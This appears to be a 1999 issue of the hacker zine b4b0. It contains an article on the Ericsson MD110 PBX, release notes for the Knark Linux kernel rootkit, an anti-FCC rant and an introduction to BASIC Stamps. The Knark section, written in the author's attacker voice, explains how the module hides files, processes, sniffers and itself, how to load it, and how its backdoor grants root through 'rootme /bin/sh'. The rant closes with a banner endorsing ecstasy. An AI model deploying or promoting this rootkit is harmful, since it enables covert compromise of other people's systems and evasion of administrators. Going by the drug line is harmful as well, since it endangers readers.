[!@#$#@!][!@#$#@!][!@#$#@!][!@#$#@!][.8.][!@#$#@!][!@#$#@!][!@#$#@!][!@#$#@!]
B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0


The Ericsson Consono MD110 PBX
by pbxphreak <chris@lod.com>

Here is some info for you people about the Ericsson MD110 PBX system. :)

Ericsson's Consono MD110 PBX, formerly known as the MD110 Business
Communications System, is a family of three stored program-controlled (SPC)
voice and data PBX models for medium to large businesses. Each member of the
Consono MD110 family accommodates a maximum of 90 incoming lines, but the
models differ in terms of station capacity, with the Consono MD110/20 handling
up to 220 stations, the Consono MD110/50 handling a maximum of 310 stations
and the Consono MD110/90 accommodating up to 330 stations. The models can be
combined in any configuration to support a maximum of 20,000 voice and 10,000
data stations.

The Consono MD110 PBX is Centrex-compatible and non-blocking, and can
accommodate a variety of facilities, including loop-start, ground-start, T1,
direct inward dial (DID), two- and four-wire E&M tie lines, ISDN, PRI, and
CEPT-1 trunks. The system also accommodates fiber-optic and microwave links.
Consono MD110 PBX data communications capabilities can be enhanced with
optional terminal adapter units, coax asynchronous converters, and modem
access units.

The Consono MD110 PBX uses a distributed processing, star-type architecture
that features end-to-end digital technology and is based on the L. M.
Ericsson AXE-10 processor. Consono MD110 software consists of functionally
related program units designed to provide optimal memory use and simplified
database access. Ericsson software adheres to international communications
standards and is specifically designed to allow multinational organizations
to utilize Ericsson Network Signalling System (ENSS) software and operate
under a homogeneous communications environment.

Ericsson offers a variety of application-specific, integrated subsystems for
use with the Consono MD110; these applications are supported at all system
sizes. Consono MD110 applications provide functions to suit individual user
requirements, including:

- Automated attendant functionality.
- Cable records and equipment inventory maintenance.
- Call detail recording and accounting activities.
- Change requests and work order processing.
- Computer Supported Telephony Applications (CSTA).
- Fax Mail.
- Hospitality services.
- LAN compatibility (token ring and Ethernet support).
- Online directory.
- Real-time performance monitoring for ACD agents.
- Traffic analysis with graphical display.
- Videoconferencing.
- Voice processing and integrated voice response.

The Consono MD110 is noteworthy because it was one of the first PBXs to
support wireless communications. Ericsson's wireless system was first
trialed in the US as the DCT900 Personal Communications System, which was
based on DECT and Cellular Telephone-3 (CT3) technology. The system operated
in the 940MHZ to 952MHz frequency range. In mid-1993, Ericsson, which had been
waiting for an FCC allocation of frequency spectrum in order to commercially
release the DCT900 system, opted instead to modify the system to conform to
current FCC policy and release it as the Freeset 900. Freeset 900 is based on
an adjunct controller that uses analog links to the main PBX. Freeset 900 can
be supported on the Consono MD110 or any non-proprietary analog or digital
PBX, key system, or Centrex system.

The Consono MD110 is fully compliant with AT&T's Integrated Services Digital
Network (ISDN) Primary Rate Interface (PRI) standards and NORTEL's DMS-100
ISDN PRI. Ericsson's test results indicate that the Consono MD110 system also
can provide PRI connections to any common carriers using DMS-100 or DMS-250
switches. The Consono MD110-supported ISDN capabilities that have been tested
include Caller ID, as well as basic call connections for voice-data and
call-by-call service selection over public, private, tie (PBX-to-PBX)
foreign exchange, in-WATS, and out-WATS lines.

The Consono MD110 has an enhanced networking capacity with the Broadband
Premises Network. The Consono MD110 equipped with a Broadband Premises
Network can support voice calls, Ethernet and token-ring LAN traffic, IBM
terminal connections, and RS-232C synchronous and asynchronous communications
via a fiber backbone. The Consono MD110 PBX accommodates standard analog
dial-pulse and dual-tone multifrequency (DTMF) station equipment, in
addition to the proprietary DBC 600 Series of digital phones, which supports
simultaneous voice and data transmission and a 2B+D line card interface. The
DBC 600 Series also incorporates circuitry that allows data terminal equipment
including synchronous and asynchronous terminals and printers, to access
the PBX. Digital telephones can achieve PC-to-telephone integration via
Ericsson's Personal Efficiency desktop application.

The Consono MD110 Series is available in three configurations with compatible
hardware and software components. Station equipment and peripherals are
common throughout the product line, facilitating upward migration, system
maintenance, and user training.

The basic building block of the Consono MD110 PBX is the line interface
module (LIM)--a processor-based, non-blocking, time-division switch capable
of accommodating approximately 250 voice and data lines. Each LIM can
function as an autonomous PBX, or as an integrated part of a larger system.
Up to two LIMs can connect directly through 32-channel, pulse-code modulation
(PCM) links; three or more LIMs connect through the Consono MD110 PBX's
second building block -- a non-intelligent, modularly expandable digital
group switch (GS) that transmits PCM voice, data, and control signals between
LIMs. Users can connect multiple LIM/GS configurations in a star/star
architecture or via a custom configuration.

The Consono MD110 system achieves redundancy by duplicating the control
system, switch, and software units. In the event of a system failure, a
switch automatically activates the passive configuration to provide
uninterrupted operation.

A typical Consono MD110 system consists of one or more LIMs connected
directly (with a maximum of two LIMs) or through a group switch. The Consono
MD110 system is designed for autonomous LIM functioning; each LIM operates as
a fully functional independent module with a separate power supply, battery
backup, and software to control call processing. Each LIM is capable of
communicating with all other LIMs in the system; inter-LIM call processing
and feature access is transparent to the user and enables LIMs to share
resources.

LIM analog and digital interface circuits are arranged, with a microprocessor
in groups of eight per card; each LIM supports up to 250 voice and data
ports. LIMs also provide such service circuits as tone receivers for DTMF
dialing, ringing equipment control circuits, and conference circuits that
support up to eight simultaneous conversions. Analog circuits convert voice
input from telephone and trunk lines to PCM-coded digital data; Ericsson
digital telephone units and attendant consoles contain internal analog to
digital circuitry for voice digitization. Groups of these line circuits form
a line signaling subsystem.

The Consono MD110 switching unit subsystem (SWS) accepts serial PCM-coded
data and converts it to parallel form for control by the processor subsystem
(PRS). The PRS controls data communications to and from the LIM through a
32-channel PCM link, as well as line circuits within the LIM through time
division switching. The PCM links carry PCM-encoded voice and data in ITU
format at rates of up to 2.048M bits per second (bps). Consono MD110 systems
consisting of three or more LIMs require a group switch. The GS is a non
blocking, time-division switching matrix that connects multiple LIMs through
the 32-channel PCM links. A fully equipped GS consists of eight cabinets
(group switch modules) and can accommodate up to 248 PCM links, allowing
expansion of the Consono MD110 PBX to its 26,000-station maximum capacity.

Each Consono MD110 LIM hardware cabinet contains two magazines, each of
which can house a maximum of 24 circuit boards. The magazines connect to one
another through a printed-circuit backplane; external connections to
telephone lines are made from the front of the printed circuit cards.
Consono MD110 systems are composed of one or more LIM cabinets
(up to a maximum of 124) for 26,000 universal ports. Customers typically
structure the Consono MD110 to meet voice/data port requirements by adding
LIM cabinets; cabinets can be arranged in single or double (back-to-back)
rows to adapt to a variety of floor plans.

Each LIM also includes five hardware subsystems: the line signal subsystem
(LSS), the switch subsystem (SWS), the processor subsystem (PRS), the input
output subsystem (IOS), and the service/maintenance subsystem (SMS). The LSS
includes interface circuits that link the LIM with external communications
devices such as telephones and attendant consoles, as well as the service
circuits that provide call processing functions (e.g., tones and ringing).
The SWS establishes and releases connections between the stations, trunks,
and other equipment, and provides two-way communications among this equipment
using time-division switching.

The PRS, which comprises the LIM processor unit and the memory unit, oversees
the LIM functions using stored programs and responds to status changes
detected by the device circuits. The IOS interfaces such digital peripherals
as display terminals and cartridge tape units to the SWS, which, in turn,
communicates with the PRS; a standard RS-232C interface (with 300- to 9600-bps
signaling) connects I/O devices. Each I/O board supports four cartridge tape
units and three terminal devices; up to six terminals can be simultaneously
active. The SMS monitors system hardware and software, detects faults,
generates alarms, aids in fault clearing, and restarts individual devices,
programs, LIMs, or the entire system. The SMS also deactivates faulty
hardware.

Broadband Premises Network. The Consono MD110 Broadband Premises Network
(BPN) integrates the PBX with a user's data and videoconferencing network.
The Consono MD110 BPN thus enables users to run voice, data, and video over
a shared 100M-bps fiber backbone, using a 2B+D format. Transmission media can
include twisted pair, fiber, T1, or microwave for linking nodes up to 1200
miles apart.

The BPN is configured with Luxcom Broadband Interface Module multiplexing
hubs, which are distributed throughout the user site and are connected over
a dual fiber ring. Each hub supports up to eight access modules, which, in
turn, support IBM terminal, LAN voice, or video traffic. Voice calls are
routed from the Consono MD110 LIMs to a Broadband Interface Module for
transport across the backbone.

The Consono MD110's software program units are organized into functionally
related modules and central and regional operating segments to optimize
system memory use and simplify database access. Each LIM is equipped with
regional software to support fully independent call processing within that
particular LIM (intra-LIM). Additional program units in each LIM support
multiple connections between LIMs and provide access to operating and service
software on an as-needed basis. Inter-LIM communications are controlled by
central software, which is accessed when a LIM transfers call processing
functions to another LIM. Central software is duplicated in multiple LIMs to
improve system reliability.

Each Consono MD110 program unit has a separate database, ensuring that
software faults can be isolated in individual program modules and enabling
users to implement changes in specific software modules without affecting the
entire operating system.

Consono MD110 program units are divided into two main functional categories:
the audio communication systems (ACS) and the service system (SES). ACS
software controls all functions related to establishing connections between
stations, trunks, and other terminal equipment connected to the system, and
includes these software components:

- Line Signaling Subsystem (LSS)--Controls the signaling
functions of the LSS hardware, including the application of
tones and ringing.
- Traffic Control System (TCS)--Sends program signals to the
switching subsystem to control the set-up, monitoring, and
release of connections in the switching matrix.
- ACS Handling System (AHS)--Stores such information as
directory numbers and class of service designations, and
permits users to change this data at any time.
Consono MD110 service system software is composed of the
operating system, the I/O programs, the maintenance and
administration routines, and the switch control. SES software
modules include:
- Switching Subsystem (SWS)--Controls the operation of the
switching matrix hardware in response to program signals
from the TCS software.
- Processor Subsystem (PRS)--Directs the overall operation of
the LIM processor, scheduling the running of subsystem
programs and performing timing functions.
- Service/Maintenance Subsystem (SMS)--Includes programs that
continuously monitor system operation, detect faults, and
generate alarms.
- Input/Output Subsystem (IOS)--Directs the loading and
dumping of software and provides access to stored data that
requires periodic modification.

The Consono MD110 also suports the proprietary Freeset 900, a wireless
telephone with an interactive display. The Freeset 900 allows six hours of
talk time and 60 hours of battery backup for extended use away from the
office. The set weighs less than seven ounces and provides full speech
encryption. The Freeset 900 Personal Communications System includes base
stations and a radio exchange unit in addition to the handsets, and can
support more than 150,000 terminals in a square mile. The radio exchange unit
is connected via hard wire to the Consono MD110 PBX and to the one or more
base stations. The system is based on CT3 technology, which is similar to the
technology for cordless home telephones; however,the Freeset 900 system
requires a base station and radio switch. Additional base stations can be
included to cover the desired area and can provide seamless handoffs. The
system's CT3 technology offers full speech encryption, PBX feature access,
and no airtime premiums.

The Consono MD110 PBX is designed to accommodate requirements for switched
voice and data communications. Internally, the switch makes no distinction
between data and voice transmission; both are performed independently or
simultaneously using a single twisted-pair of wires. Data devices and digital
telephones use the same digital line cards.

The bit-transparent architecture of the Consono MD110 supports both
asynchronous and synchronous data transmission independent of protocol. The
system also includes a digital trunk interface and provides data users with
direct access to such features as host port contention, domain switching, and
destination queuing, in addition to data call origination options such as
telephone keypad dialing, smart modem command, menu selection, single button
access, and hotline connection.

The various data communications devices enabling multiple data applications
include terminal adapter units, modem access units, data line units, and a
digital trunk interface.

Terminal adapter units (TAUs) connect data terminal equipment, including
display terminals and computers, to digital lines served by the Consono
MD110. TAUs enable users to add data communications equipment to the system
without affecting the system's integrity or operation. The Consono MD110's
digital connection format eliminates the need for digital-to-analog and
analog-to-digital conversion for internal data switching, and for on-net
communications between multiple Consono MD110s connected via digital trunks.

Each TAU supports the appropriate signals on an RS-232C or ITU V.35 interface,
along with the appropriate transmission mode and speed, number of start/stop
bits, and interface type. TAUs support both asynchronous (up to 38.4K bps)
and synchronous (up to 64K bps) operation, in full-duplex mode, and provide
visual indicators that enable users to monitor call status. In addition,
a local test button allows users to test system operation and isolate faults.

Terminal Adapter Unit for Standalone Operations (TAU-S). TAU-S is a standalone
unit designed for data-only applications--such as shared printer connections,
computer ports, and isolated terminals -- within the Consono MD110 system.
TAU-S supports transmission speeds of up to 19.2K bps asynchronous and 48K bps
synchronous through an RS-232C interface. Four programmable buttons located
on the unit's front panel allow users to access a set of predefined functions
and call destinations. Power, test, receive data, transmit data, and data
terminal-ready indications are provided by status LEDs. The unit also
incorporates a two-digit display that indicates call progress.

TAU-S connects to the Consono MD110 via a single twisted- pair wire. Users
program TAU-S options from the Consono MD110 administration terminal; fault
location and loopback testing are initiated from the unit's front panel test
button.

Terminal Adapter Unit for High-Speed Operations (TAU-H). The TAU-H unit
operates in standalone mode for data-only transmission and is intended
primarily to support high-speed synchronous ECMA or DMI applications such as
host-to-host or LAN-to-LAN communications. TAU-H supports both asynchronous
and synchronous operations at up to 19K bps through an RS-232C interface, and
synchronous operations at up to 64K bps through a V.35 interface.

The TAU-H unit incorporates a Dual In-Line Package (DIP) switch that allows
the user to select one of the following operating modes: standard TAU-H mode;
ECMA Rate Adaptation protocol; DMI protocol; or Menu Interface with autobaud
detection. The Menu Dialing feature is provided through system firmware and
supports data connections and data configuration changes from the DTE
keyboard.

Terminal Adapter Unit Asynchronous. The TAU-2620 unit for asynchronous
communications operates in standalone mode for data- only transmission, and
in dual mode for simultaneous voice and data transmission. In standalone mode,
TAU-2620 transmits data at user-programmable speeds of up to 19.2K bps.

TAU-2620 operation is controlled by on-board firmware; the unit supports
Hayes SmartModem keyboard dialing commands and autobauding, and includes a
user-enabled/disabled menu overlay that provides operational prompts.
TAU-2620 also incorporates an RS-232C/V.24 connector to facilitate data
connections.

The Consono MD110 PBX DS1 digital trunk interface combines 24 64K-bps DS0
channels into a single data stream operating at the DS1 rate of 1.544M bps.
The T-carrier-compatible DS1 digital trunk interface, used in conjunction
with multiple Consono MD110 systems or other PBXs, provides transparent
transmission of digital communications. The channels are administered as
separate trunk circuits assigned to trunk groups, allowing features to be
restricted in the same manner as analog trunks.

Each DS0 channel can be used for digitized voice, data, or signaling
transmission, and can be treated as a separate trunk circuit. The DS1 trunk
supports both D4 and Extended Superframe Format (ESF); the DS1 in CAS Mode
interfaces to a digital central office or an analog central office via a D3
or D4 channel bank.

The Consono MD110 PBX offers a wide range of features to ensure efficient
communications and increase user productivity. consono MD110 system, station,
and attendant features are accessible from analog and digital telephones, as
well as from the attendant console. The system also supports several
applications packages that provide additional call processing and management
features.

Standard features of the Consono MD110 include operator-controlled system
administration, automatic callback, executive intrusion, call waiting, call
diversion, and follow-me paging. In addition, the Consono MD110 PBX supports
such call/cost management features as least cost and alternative routing,
account codes, and toll restrictions. Data features include packet switching,
protocol emulation, gateway functions, host port sharing, domain switching, and
destination queuing. In addition, data feature users can utilize keypad dialing,
menu selection, single-button feature access, and hotline functions. All
system features can be networked transparently through the various nodes of a
networked Consono MD110.

System features of the Consono MD110 are:

- Abbreviated dialing.
- Code call access.
- Conference (add-on, attendant, flexible station control).
- Data privacy and restriction.
- Dial dictation access.
- Direct in lines.
- Direct inward dialing (DID).
- Direct outward dialing (DOD).
- Flexible numbering plan.
- Hotline.
- Intercom blocking.
- Manual line service.
- Night service.
- Off-premises extensions.
- Power failure transfer.
- Remote maintenance facility.
- Remote system alarm access.
- Station override security.
- Tandem trunking.
- Tenant service.
- Trunk queuing.
- Uniform numbering plan.
- Voice paging.

Consono MD110 station users activate features by pressing a single key on a
digital telephone instrument, or by dialing a code on the keypad of an analog
or digital telephone set. Consono MD110 stations provide such basic call
handling features as hold, conference, transfer, directed and group call
pickup, call forward, and call park, in addition to call waiting indications
for internal and external calls. Consono MD110 station users also have access
to last number redial and emergency speed-dial features, as well as automatic
callback and abbreviated dialing. Consono MD110 stations provide message waiting
indicators, as well as distinctive ringing for internal and external calls.

  


Ericsson digital station instruments provide access to additional call
handling features, including direct trunk access, direct trunk group
selection, and a data transmission interface. Digital station displays
indicate call diversion destinations, call pickup sources, call waiting
sources callback numbers, calling numbers, conference modes, dial input
verifications, incoming call sources, and stored speed-dial numbers; feature
button illumination indicates when a feature is active. Digital stations also
support handsfree and headset operation, provide privacy and privacy release
buttons, and offer incoming line preference, ringing line preference, prime
line preference, and no line preference features.

Ericsson's digital telephones can also be equipped to provide softkey
operation. BC 8 software enables the display to change information fields on
the bottom row of the telephone's screen according to the call state, and
programmed features are accessible with a single keystroke. Other station
features supported by BC 8 include Stop Watch and Diversion Message.

The Consono MD110 offers a variety of optional applications that provide
enhanced call processing functions, including a switch-to-computer interface,
automatic call distributor (ACD), wireless network, voice messaging system,
and emergency 911 services.

ApplicationLink. The Ericsson ApplicationLink provides a switch-to-computer
link for the Consono MD110 system. By integrating private exchanges with
computer systems, users can create custom-tailored applications. This
interface provides access to IBM's CallPath services, Digital Equipment's
Computer Integrated Telephony (CIT) switch-to-host integration programs,
and Tandem Computers' Call Application Manager (CAM) service, thus paving the
way for more open applications. ApplicationLink is based on the Computer
Supported Telecommunications Applications standard (CTSA) developed by the
European Computer Manufacturer's Association (ECMA).

ApplicationLink can be used in conjunction with Ericsson's ACD/MIS applications
for enhanced call processing. The interface allows synchronized screen
management, which provides agents with immediate call identification and
database information related to calling or called parties. ApplicationLink
also enhances call processing by enabling agents to answer calls, transfer
calls, and make calls from a computer terminal. Additional features include
computer-aided routing, outbound dialing, automated call handling, and
administrative functions.


- this was a research article done for b4b0 - Sept 1999


B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0
[!@#$#@!][!@#$#@!][!@#$#@!][!@#$#@!][.9.][!@#$#@!][!@#$#@!][!@#$#@!][!@#$#@!]
B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0


Knark - Kernel Based Linux Rootkit

Creed brings you... KNARK V0.41!!!

Knark is a kernelbased "rootkit" for Linux 2.1-2.2 (and some 2.3 kernels).
This package includes knark.c, the heart of the package, the evil lkm
(loadable kernel module) which wraps some syscalls.

Remember that none of the programs/files included in the knark package may
be used in an illegal way, or to cause damage of any kind.

CHANGES IN 0.41:
Added a self-promotion file in /proc, HEHEHE! :-)
Moved some defines from knark.c to knark.h.
Fixed some memory leaks (I'm sure there are more to find).
Changed loads of *inode* function and variable names to *file* names.
Changed file name from /proc/knark/inodes to /proc/knark/files, and made
file names appear instead of inode numbers/dev numbers.
Changed Makefile so knark.c compiles without warnings.
Changed knark_read() to make /proc/modules act normal when knark is hidden.
Hacked sys_time so you can get root without setuid binaries.
Minor changes in inode functions in knark.c.
rootme.c added to use the sys_time shit.
hidefile renamed to hidef, and unhidef (to unhide hidden files) has been
added.

KNOWN BUGS:
/proc/knark/files will only show the directory tree from the file system
where the file is. /proc/ioports will be shown as /ioports.
The kernel crashes sometimes when the module is unloaded. Though it seems
to work quite ok when it's loaded.
Please notify me by email if you find other nasty bugs.

What is changed in the kernel when knark.o is loaded?

sys_getdents is hacked to hide arbitrary files with the hidefile program
and to hide process directories in /proc.

sys_kill is hacked to hide processes when sending signal 31, and unhide
hidden processes with signal 32.

sys_read is hacked to hide arbitrary parts in arbitrary files. This
isn't implemented yet, so just ignore this feature for now. All it does is
now is hiding MODULE_NAME in /proc/modules and NETSTATHIDE in
/proc/net/[udp|tcp].

sys_ioctl is hacked to hide IFF_PROMISC flag on network devices when
SIOCGIFFLAGS is requested.

sys_fork is hacked to hide childs of hidden processes.

sys_clone does the same thing as fork.

sys_query_module is hacked to hide the module and prevent unloading of
it if knark.c is compiled with HIDEMODULE defined.

sys_time is hacked to give you *uid and *gid 0 when it's called with
TIMEROOTNUM as it's argument. The program rootme.c uses this feature.

A hidden directory is created, called /proc/knark. You can read
information about hidden processes in /proc/knark/pids and hidden files
can be read in /proc/knark/files. You can change the name of the
/proc directory by change MODULE_NAME in knark.h.


I'm lame! How do I use this lkm?

First of all, remove -DHIDEMODULE from Makefile if you want to be able to
unload the module (however, the kernel crashes sometimes when you unload
knark.o).

then type:
make
modprobe ./knark.o
*done*

when you're not root and want root privs, type ./rootme /bin/sh (or
something else if you don't like /bin/sh).

Hide files with hidef and unhide them with unhidef. Try to figure out the
syntax if you can ;-).

Remember that sniffers can't be detected by promisc-mode checking. And
files inside a hidden directory are just as invisible as the directory
itself. Don't load and unload the lkm many times since processes may die
and the kernel may crash (email me bugfixes if you care).

This is a beta release! It may crash your system! Don't blame me! (hehe).
And don't use this program in an illegal way.

email: creed@sekure.net
ircnet: #linux.se, #hack.se (don't ask me for the key if it's +k)
efnet: #hack.se


B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0
[!@#$#@!][!@#$#@!][!@#$#@!][!@#$#@!][.10][!@#$#@!][!@#$#@!][!@#$#@!][!@#$#@!]
B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0


Dismantle the FCC

by opt1mus pr1me and zortinator

Recently, the FCC placed a 5% tax on all long distance phone bills. No,
not congress, the Federal Communications Commission actually had the
audacity to TAX us! Talk about unconstitutional! Well, it is not like the
FCC was ever constitutional in the first place. The duty of this government
agency is to make sure we do not hear, read, or watch what the government
does not like. This is clearly a violation of our first amendment right of
free speech because it restricts information or speech that does not even
pose a threat to others. I mean, yelling "fire" in a crowded theater is one
thing because you will cause a panic, or disturbing the peace is another.
However, when people have the option to turn off their radios, change the
television station, or stay away from certain websites, the government has
no right to abridge free speech in any way. Who is being physically harmed
here? No one. There are no victims! Sure, some kid might stumble onto a
porno site and see a bunch of naked chicks making out with each other.
But, it is not the duty of government to be our nanny and regulate our
moral lives, especially when it is unconstitutional. And it is certainly
not the duty of the FCC to tax us!

You see, the tax was part of Al Gore's latest scam: the
telecommunications act. This new legislation would connect every government
funded school to the internet within a matter of time. Well, if you are the
type that gets visions of angel wings and halos every time you see Al Gore,
think of the ideological and economic sacrifices such an act would require.
You see, when the government found out that it needed an extra $900 million
dollars to complete this task, it told the FCC to use any means necessary to
collect this money. So, they slapped us all with a new tax on all long
distance charges. This is unconstitutional because only CONGRESS HAS THE
POWER TO TAX. This should not be overlooked as a minor issue, this is a
government bureaucracy taxing the citizens of our country without LEGAL
authority! If the FCC can do it, then we could have all sorts of agencies
wielding unconstitutional authority to carry out its vendettas. Remember
Waco, anyone?

Of course, not many people are going to rise up in protest. It is for the
children, isn't it? I mean, today, you can come up with any idiotic
government tax and spend operation, attach some sappy message to it, and
sell it off to the American public as the greatest thing to happen since the
Declaration of Independence! How many laws in this country do we have today
that are supposed to benefit the children? Well, we have pornography laws,
drug laws, anti-cigarette laws, and now we have the telecommunications act.
The FCC is doing nothing but upholding the values of a few fat guys in
Washington who think that we are just too stupid not to hurt ourselves. What
kind of paternalistic society is this, anyways? It is like the federal
government believes it is some sort of parent who can stand over its
citizens and say "Don't look at pornography! Don't smoke! Don't do drugs!".
In fact, the government is even worse than that because, not only does it
tell us not to do these things instead of educating us, it does not even
allow us to participate in these activities, and it wastes alot of money
that could otherwise be put to useful purposes! What is good for me
might be bad for you and what is good for you might be bad for me. Shouldn't
we be the ones to decide that, not the federal government?

Our tax dollars are going to the FCC to support a certain kind of
morality: one that does not believe in freedom of speech or expression. This
is not government's job! Governments job is to keep us from physically or
fiscally harming others, not to make sure we are living up to a proper moral
code. Even if I am not a legal adult, I should still have access to all the
pornography, hate literature, and unpopular political platforms I want! I
can understand the regulation of cigarettes or drugs, so long as they are
mildly regulated (such as setting an age as to when we can buy these
products). However, information is totally different and should be totally
UNREGULATED. The only information that should be kept from the public is
information that involves security issues. If the government can prevent me
from buying an issue of Hustler magazine now, then what would be next? The
Communist Manifesto? The Koran? On the Origin of Species? There is no limit
to what congress can keep out of the hands of minors so long as they
proclaim that it has no "scientific or redeeming value".

And what exactly constitutes redeeming value? Well, it whatever our big
government fat cats feel like. They decide based on THEIR moral codes and
then force it on the rest of the nation by law. What my be considered
pornography to them might be considered art to me. The fact of the matter is
that it should be up to me to make that decision, not them. And if I do not
want to look at it, I don't have to. If I do not want my children to look at
it, then all I have to do is exercise my parental authority. This is exactly
where the issue should be - in the hands of parents, not the government. If
I want my kids to read the Turner Diaries with my permission, I should have
every right to it. If I do not, then I will not let them. When it comes to
the internet, where most kids seem to be more cyber literate than adults, we
have a variety of filtering software that can be used to keep Bobby away
from all those temptations and lusts of the flesh. Some claim that they are
not very reliable; however, if we had no internet censorship, then perhaps
their would be a greater market for such products and competition would
refine such products.

Besides, in the end, we are all faced with the constitution. If the
government can just casually violate it, then what is the point of even
having one? It seems to me that most of the guys in Congress have not even
read the thing! I mean, what part of "Congress shall make no
law....abridging the freedom of speech, or of the press, or of the right of
the people peaceably to assemble..."
? And where does the FCC think it draws
its authority when it taxes us?! None of us voted for anyone serving in the
FCC who passed that 5% tax on long distance calls. It was completely out of
our hands, and very few seem to mind. The fact that Americans have lost
interest in our political system is exactly why we are being run by voting
blocks and interest groups. I mean, we have less than a 40% voter turn out
for God's sake! In fact, we have the lowest voter turn out amongst the
industrial, first world nations! And we are the country that made it so
trendy too! Is America, the "land of the free" really free any more?


___
| |
|___|_____
/\ /\
O O
@/ . \@
| |
| O | ** SURGEON GENERAL NOTICE **
\___ / ** .A MESSAGE FOR THE MASSES. **
/ \
| M M | <chrak> E is good for u.,
| | | |
| | | | ** ...END OF TRANSMISSION... **
|_| |_|
@| | |@
| | |
___| | |___
|_____|_____|


B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0
[!@#$#@!][!@#$#@!][!@#$#@!][!@#$#@!][.11][!@#$#@!][!@#$#@!][!@#$#@!][!@#$#@!]
B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0 - B - 4 - B - 0


An introduction to BASIC Stamps.
********************************


In this article I'll try to explain as easy as possible what BASIC Stamps are.
If you already know what they are, then you won't learn anything usefull from
this article. BASIC Stamps are small reprogrammable single board computers
(SBC) that run PBASIC programs. It's perfect for many prototyping and control
applications. Some typical application areas for the BASIC Stamps are general
electronics, home automation, robotics, mini PLC, education, industry control,
HAM related applications, special FX in films, geological instruments, computer
peripherals, scale model hobbyists... model train hobbyists. They have fully
I/O pins that can be used to directly interface to TTL-level devices, such as
buttons, LEDs, speakers, potentiometers and shift registers. With a few extra
components, these I/O pins can be connected to non-TTL devices, such as relays,
solenoids, RS-232 networks, and other high current/voltage devices. They are
made by a company called Parallax, Inc. (http://www.parallaxinc.com). In size,
they're pretty small, but they are very powerful. And they're cheap too...


5V regulator EEPROM Interpreter chip
\ \ /
.------------------------------------------.
| .-. .iiii. .ii. .iiii. .----. .-. |
| | | | | `--' | | = = | | |
| `-' | | | | = = | | | <--- 4MHz resonator
| `----' `----' `----' `-' |
\ T T T T T T T T T T T T T T /
/ /
+5V output 8 I/O pins


The ASCII illustration above shows a BASIC Stamp 1 (BS1-IC). It costs $34.00
and it has 8 I/O pins, holds 80 to 100 instructions and executes an average
of 2000 instructions/sec. All the BASIC Stamps have the same logical design,
consisting of a 5 volt regulator, resonator, serial EEPROM and Parallax BASIC
(PBASIC) interpreter. So, if you want to buy a BASIC Stamp, but don't know
which to get, then you should try the BASIC Stamp Programming Package. Check
out Parallax's homepage for more information about that. Anyway, the PBASIC
program is stored in an EEPROM and can be reprogrammed almost endlessly. To
program a BASIC Stamp you'll need to connect it to a compatible machine and
run Parallax's special editor, using the Parallax BASIC programming language,
that is very similar to good old BASIC. Below, you can see a complete list
of all the PBASIC commands...


Branching:
IF/THEN .... Compare and conditionally branch.
BRANCH ..... Branch to address specified by offset.
GOTO ....... Branch to address.
GOSUB ...... Branch to subroutine at address.
RETURN ..... Return from subroutine.


Looping:
FOR ........ Establish a FOR - NEXT loop.
NEXT .......


Numerics:
LET ........ Perform variable manipulation.
LOOKUP ..... Lookup data specified by offset and store in variable.
LOOKDOWN ... Find target's match number (0-N) and store in variable.
RANDOM ..... Generate a pseudo-random number.


Digital I/O:
INPUT ...... Make pin an input.
OUTPUT ..... Make pin an output.
REVERSE .... Input to output/output to input.
LOW ........ Make pin output low.
HIGH ....... Make pin output high.
TOGGLE ..... Make pin an output and toggle state.
PULSIN ..... Measure an input pulse.
PULSOUT .... Output a timed pulse by inverting a pin for some time.
BUTTON .... Debounce button, perform auto-repeat, branch to address.
SHIFTIN .... Shift bits in from parallel-to-serial shift register.
SHIFTOUT ... Shift bits out to parallel-to-serial shift register.
COUNT ...... Count cycles on a pin for given amount of time.
XOUNT ...... Generate X-10 powerline control codes.


Serial I/O:
SERIN ...... Serial input and variables for storage of received data.
SEROUT ..... Send data serially.


Analog I/O:
PWM ........ Output PWM then return pin to input.
POT ........ Read a 5 to 50K potentiometer and scale result.
RCTIME ..... Measure an RC charge/discharge time.


Sound:
FREQOUT .... Generate one or two sine waves of specified frequencies.
DTMFOUT .... Generate DTMF telephone tones.
SOUND ...... Play notes.


EEPROM access:
DATA ....... Store data in EEPROM before D/L'ing BASIC program (BS2-IC).
EEPROM ..... Store data in EEPROM before D/L'ing BASIC program (Stamp D/BS1-IC).
READ ....... Read EEPROM byte into variable.
WRITE ...... Write byte into EEPROM.


Time:
PAUSE ...... Pause execution.


Power control:
NAP ........ Nap for a short period.
SLEEP ...... Sleep.
END ........ Sleep until the power cycles.


Program debug:
DEBUG ...... Sends variables for viewing.


For an example of a program, we can take a look at Guy Gustavson's invention.
His cat had a disease and it had to get food thru a tube down it's nose, but
Gustavson couldn't be there every three hours to feed it, so he got a tiny
motor driven pump, a case, some switches, a micro switch, etc. The micro
switch is mounted such that the switch trips for every rotation of the pump
shaft. The stamp turns on the pump for on a single rotation at intervels
programmable from the control switches on top. An alarm buzzer and LED
flash if the pump fails to run for any reason. The unit is programmable
for 9 differents deleviery rates. Now his cat gets a slow continuious
feeding, and it seems to tolerate this better than the 100ML feeding every
three hours.


.----------------------------------------------------------------------------.
| BASIC Stamp products |
|----------------------------------------------------------------------------|
| Part number | Product | Price |
|----------------------------------------------------------------------------|
| BS1-IC | BASIC Stamp 1 | $34.00 |
| BS2-IC | BASIC Stamp 2 | $49.00 |
| BS2I-IC | BASIC Stamp 2 (Industrial) | $54.00 |
| BS2SX-IC | BASIC Stamp 2SX | $59.00 |
| #27100 | BASIC Stamp rev. D | $34.00 |
| #27110 | BS1-IC Carrier Board | $15.00 |
| #27120 | BS2-IC Carrier Board | $20.00 |
| #27130 | BASIC Stamp Super Carrier Board | $39.00 |
| #800-00001 | Parallel Cable (Rev. D and BS1-IC) | $19.00 |
| #800-00003 | Serial Cable (BS2-IC) | $10.00 |
| #27200 | BASIC Stamp I/II/IISX Pgm. Package | $99.00 |
